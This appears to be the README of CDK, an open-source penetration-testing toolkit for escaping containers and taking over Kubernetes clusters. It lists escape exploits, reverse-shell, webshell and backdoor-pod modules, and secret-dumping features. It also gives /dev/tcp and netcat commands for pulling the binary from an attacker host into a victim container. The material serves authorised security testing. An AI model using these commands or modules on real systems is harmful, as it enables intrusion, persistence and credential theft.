18 KiB
CDK https://github.com/cdk-team/CDK
CDK - Zero Dependency Container Penetration Toolkit
English | 简体中文
Legal Disclaimer
Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.
Overview
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
Installation/Delivery
Download latest release in https://github.com/cdk-team/CDK/releases/
Drop executable files into the target container and start testing.
TIPS: Deliver CDK into target container in real-world penetration testing
If you have an exploit that can upload a file, then you can upload CDK binary directly.
If you have a RCE exploit, but the target container has no curl
or wget
, you can use the following method to deliver CDK:
- First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
- Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
Usage
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk auto-escape <cmd>
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
Options:
-h --help Show this help msg.
-v --version Show version.
Features
CDK has three modules:
- Evaluate: gather information inside container to find potential weakness.
- Exploit: for container escaping, persistance and lateral movement
- Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.
Evaluate Module
Usage
cdk evaluate [--full]
This command will run the scripts below without local file scanning, using --full
to enable all.
Tactics | Script | Supported | Usage/Example |
---|---|---|---|
Information Gathering | OS Basic Info | ✔ | link |
Information Gathering | Available Capabilities | ✔ | link |
Information Gathering | Available Linux Commands | ✔ | link |
Information Gathering | Mounts | ✔ | link |
Information Gathering | Net Namespace | ✔ | link |
Information Gathering | Sensitive ENV | ✔ | link |
Information Gathering | Sensitive Process | ✔ | link |
Information Gathering | Sensitive Local Files | ✔ | link |
Information Gathering | Kube-proxy Route Localnet(CVE-2020-8558) | ✔ | link |
Discovery | K8s Api-server Info | ✔ | link |
Discovery | K8s Service-account Info | ✔ | link |
Discovery | Cloud Provider Metadata API | ✔ | link |
Exploit Module
List all available exploits:
cdk run --list
Run targeted exploit:
cdk run <script-name> [options]
Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc |
---|---|---|---|---|---|
Escaping | docker-runc CVE-2019-5736 | runc-pwn | ✔ | ✔ | |
Escaping | containerd-shim CVE-2020-15257 | shim-pwn | ✔ | link | |
Escaping | docker.sock PoC (DIND attack) | docker-sock-check | ✔ | ✔ | link |
Escaping | docker.sock RCE | docker-sock-pwn | ✔ | ✔ | link |
Escaping | Docker API(2375) RCE | docker-api-pwn | ✔ | ✔ | link |
Escaping | Device Mount Escaping | mount-disk | ✔ | ✔ | link |
Escaping | LXCFS Escaping | lxcfs-rw | ✔ | ✔ | link |
Escaping | Cgroups Escaping | mount-cgroup | ✔ | ✔ | link |
Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | ✔ | ✔ | link |
Escaping | Procfs Escaping | mount-procfs | ✔ | ✔ | link |
Escaping | Ptrace Escaping PoC | check-ptrace | ✔ | ✔ | link |
Escaping | Rewrite Cgroup(devices.allow) | rewrite-cgroup-devices | ✔ | ✔ | link |
Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | ✔ | ✔ | link |
Discovery | K8s Component Probe | service-probe | ✔ | ✔ | link |
Discovery | Dump Istio Sidecar Meta | istio-check | ✔ | ✔ | link |
Discovery | Dump K8s Pod Security Policies | k8s-psp-dump | ✔ | link | |
Remote Control | Reverse Shell | reverse-shell | ✔ | ✔ | link |
Credential Access | Registry BruteForce | registry-brute | ✔ | ✔ | link |
Credential Access | Access Key Scanning | ak-leakage | ✔ | ✔ | link |
Credential Access | Dump K8s Secrets | k8s-secret-dump | ✔ | ✔ | link |
Credential Access | Dump K8s Config | k8s-configmap-dump | ✔ | ✔ | link |
Privilege Escalation | K8s RBAC Bypass | k8s-get-sa-token | ✔ | ✔ | link |
Persistence | Deploy WebShell | webshell-deploy | ✔ | ✔ | link |
Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | ✔ | ✔ | link |
Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | ✔ | link | |
Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | ✔ | ✔ | link |
Persistence | Deploy K8s CronJob | k8s-cronjob | ✔ | ✔ | link |
Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
Tool Module
Running commands like in Linux, little different in input-args, see the usage link.
cdk nc [options]
cdk ps
Command | Description | Supported | Usage/Example |
---|---|---|---|
nc | TCP Tunnel | ✔ | link |
ps | Process Information | ✔ | link |
ifconfig | Network Information | ✔ | link |
vi | Edit Files | ✔ | link |
kcurl | Request to K8s api-server | ✔ | link |
dcurl | Request to Docker HTTP API | ✔ | link |
ucurl | Request to Docker Unix Socket | ✔ | link |
rcurl | Request to Docker Registry API | ||
probe | IP/Port Scanning | ✔ | link |
Release Document
If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the Release Document.
Developer Docs
Contributing to CDK
First off, thanks for taking the time to contribute!
By reporting any issue, ideas or PRs, your GitHub ID will be listed here.
Bug Reporting
Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.
Suggesting Enhancements
Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.
Pull Requests
Fix problems or maintain CDK's quality:
- Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
- Running screenshots or logs before and after you fix the problem.
New feature or exploits:
- Explain why this enhancement would be useful to other users.
- Please enable a sustainable environment for us to review contributions.
- Screenshots about how this new feature works.
- If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.
项目相关
- 2021-11-11 发布文章《CDK:一款针对容器场景的多功能渗透工具》
最近更新
[v1.3.0] - 2022-07-10
Exploits
- 为 ParseCDKMain 添加单元测试
- 新增'Exploit container escape with kubelet log access & /var/log mount'
- 新增 kubelet 默认未授权访问利用(端口10250)
Others
- 在 github action 中新增了 go test
- 支持 linux 容器获取网关
- 更新文档,新增了 快速开始 章节
- 新增在 pods 中获取网关
[v1.2.0] - 2022-06-25
更新
- 新增 Exploit:从 etcd 获取 k8s 的 token
- 添加输出结束消息
- 移除 --insecure-port 参数
[v1.1.0] - 2022-05-30
Exploits
- 在使用说明 banner 中添加 ocd 和 CDK
- 修复 exp 添加 run 描述文档
- 修复 exp 在 /proc/pid 路径出现的错误
- 修复 exp 中 k8s-psp-dump 参数检测错误
- 修复 exp 检查命令行中 cdk 进程的错误
- 移除 StringContains 相关重复函数
- 仅在 linux 上构建 mount cgroup
About Evaluate
- 添加 DNS-Based 服务发现
- 添加色彩标注的 perf
- 新增获取当前 pid cgroup 信息
Others
- github action 中添加 Evaluate/Exploit/Tool 等测试,修复部分问题
[v1.0.6] - 2022-03-10
更新
- 仅在 linux 下构建 mount-cgroup
- 修复 CentOS unprivileged_userns_clone 文件不存在的问题
- 添加 CVE-2022-0492 的 EXP
- 修复运行 exp 时 shim-pwn 异常退出的问题
- 将 shell 实现的 mount-cgroup 功能改为 Golang 实现
[v1.0.5] - 2022-03-06
更新
- 修复运行 exp 时 shim-pwn 异常退出的问题
- 在 docopt 添加 eva 参数
- 支持 cdk eval
- 同步 github.com/containerd/containerd 到 1.4.12
- 同步 github.com/tidwall/gjson 到 1.9.3